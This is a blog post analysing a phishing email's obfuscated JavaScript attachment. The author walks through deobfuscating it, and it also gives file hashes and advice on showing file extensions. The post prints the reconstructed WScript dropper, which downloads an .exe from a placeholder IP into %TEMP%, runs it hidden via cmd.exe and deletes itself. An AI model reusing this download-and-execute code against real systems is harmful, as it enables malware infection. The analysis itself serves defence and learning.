Analyzing JavaScript Malware


About half of a year ago, my girlfriend got e-mail from post office saying that the the package was ready to pickup, with a quick note saying that more information is available in the attachment. I was asked to look at it, as she found it suspicious - mail was written very poorly - definitely not what official mail would sound like. Firstly I took a look at the domain, from where this mail was sent, and as I excepted, it was not connected to domains of our post service. But what I really wanted to know was, what's the goal of the attachment?

First contact

After downloading it, I noticed that the extension of the file was .js - some JavaScript file. But it was only possible because I had turned on showing files with their extensions. Someone without this option would see it only as .txt file. Viewing the source, unfortunately at first, gave me no clue how it works. Script was made of around 400 lines of code. But after looking closer it seemed, that around quarter of the code was actually part that did something, rest was only filled with assigned variables and functions returning pieces of words.

var tbuloq1 = {
	itxy:'plebydva', 8423:730, ldipli:353, lgahze:"AtEn", ekxov:'dipyvvo'
}
["lgahze"];
function daqkuvtejqa3 () {
           var ssororg0 = {
		lifki:'hylxyzra', 2216:"d", 6034:'ubylivw'
	}
	;
	var xhahbolz3 = ssororg0["2216"];
           return xhahbolz3;
}

But after some time I noticed a pattern - in last 30 lines of code, there were only references to the variables, and after connecting them together what I got, was much more readable than before. In example, if you take this piece of code and connect to the variables in the beggining, what you'll get is something more likely looking like this.

ejybpib6= zoracufyp7[nsatqe9 + oxqokowj9 + ynxyru7 + exgemko2];

Great, now to make it clearer to read I have to do the same. Unfortunately I'm not completely sure that it's 'translated' 100% correctly, but it still gives me insight into how this script may work.

ejybpib6 = this.WScript;

Finally, after around 3 hours, I got the full translation. But I've got still a few questions, what is WScript and how it works?

ejybpib6 = this.WScript;
ehynzedda7 = WScript.CreateObject(Scripting.FileSystemObject);
elmona4 = WScript.CreateObject(WScript.Shell);
acjihy9 = WScript.CreateObject(MSXML2.XMLHTTP);
jyfej9 = WScript.CreateObject(ADODB.Stream);
oqavate7 = ehynzedda7.GetSpecialFolder(2);

if (typeof document == undefined) {
  kagignu5 = WScript.CreateObject(Scripting.FileSystemObject).GetTempName();
}

if(typeof WScript.StdIn.AtEndOfStream == unknown) {
  ixzebni1 = WScript.CreateObject(MSXML2.XMLHTTP).open(GET, 'http://some_ip_address/8899.exe', 0);
}
ixzebni1 = WScript.CreateObject(MSXML2.XMLHTTP).send();
WScript.CreateObject(ADODB.Stream).type = 1;
try {
    if(!WScript.Arguments.Unnamed.length]) {
			oxacobmo3 = WScript.CreateObject(MSXML2.XMLHTTP).ResponseBody;
		}
    ruzetpa0 = WScript.ScriptFullName;
    ixzebni1 = WScript.CreateObject(ADODB.Stream)Open();
    ixzebni1 = WScript.CreateObject(ADODB.Stream).Write(oxacobmo3);
    ixzebni1 = WScript.CreateObject(ADODB.Stream).SaveToFile(oqavate7 + kagignu5);
    ixzebni1 = WScript.CreateObject(ADODB.Stream).Close();
    ixzebni1 = WScript.CreateObject(WScript.Shell).run(cmd.exe /c + oqavate7 + kagignu5, 0;
    ixzebni1 = WScript.CreateObject(Scripting.FileSystemObject).deleteFile(ruzetpa0);
}
catch(e) {
}

Okay, as far as I can understand, it downloads the file from url (not shown in this code), and somehow executes it, maybe using cmd? But for better insight I had to dig for references showing the use of the WScript and other functions show in this code.

Understanding

Windows Host Script is an Windows eviroment, providing the user with a possibility to run scripts in a variety of languages. By default, when JavaScript is saved to your hard drive, it will be run by WSH with power of executable file.

Script uses these WScript calls:

  • WScript.CreateObject(WScript.Shell) - provides access to shell methods of operating system.
  • WScript.CreateObject(MSXML2.XMLHTTP) - XML request using HTTP.
  • WScript.CreateObject(ADODB.Stream) - is used to represent a stream of data or text.

GetSpecialFolder(2) will get the %TEMP% folder.

Then the script creates the XML request to get the data from specified URL and, then it sends the request.

After that script creates a series of commands to:

  1. Get the response body of the request.
  2. Write it to a file in tmp directory.
  3. Save and close the file.
  4. Execute through CMD
  5. Lastly, it will delete the file.

Unfortunately, .exe file was not available, while I got to check, and I couldn't find as much info about it as I wanted. The only information I could find were:

Operating System: Windows 7 / 8 / 8.1 / 10
Singature Name: QVM07.1.Malware.Gen

Main Info:

Name: 8899.exe

Size: 569464

Type: PE32 executable (GUI) Intel 80386, for MS Windows

MD5: 3771453fc565a0436534d509dcb7da9f

SHA1: 803e3634a70dd3b9ce2b409b108cb1baf5fa3d08

Freezing computer.
New home page in browsers.
Ads and pop-ups on desktop and browser.
Very slow loading speed of webpages.
Computer work slower then usual.

Conclusion

Author of this malware did a lot, to try and obfuscate this script, as I spent a lot of time trying to make it readable, but still it wasn't as complicated as I thought at first. To stay protected from these kinds of attacks, remember to tell explorer to open .js files through the Notepad by default, as well as show files with their extensions. That way you will see if it's really a text document or .txt.js malware. And the most important step, don't download files that you're unsure about. Simply, don't trust anyone ;)

I had great fun, trying to understand the concept, and even though you may think, that it was very simple, I still learned a lot from this.

Keep learning and stay safe! ~ W3ndige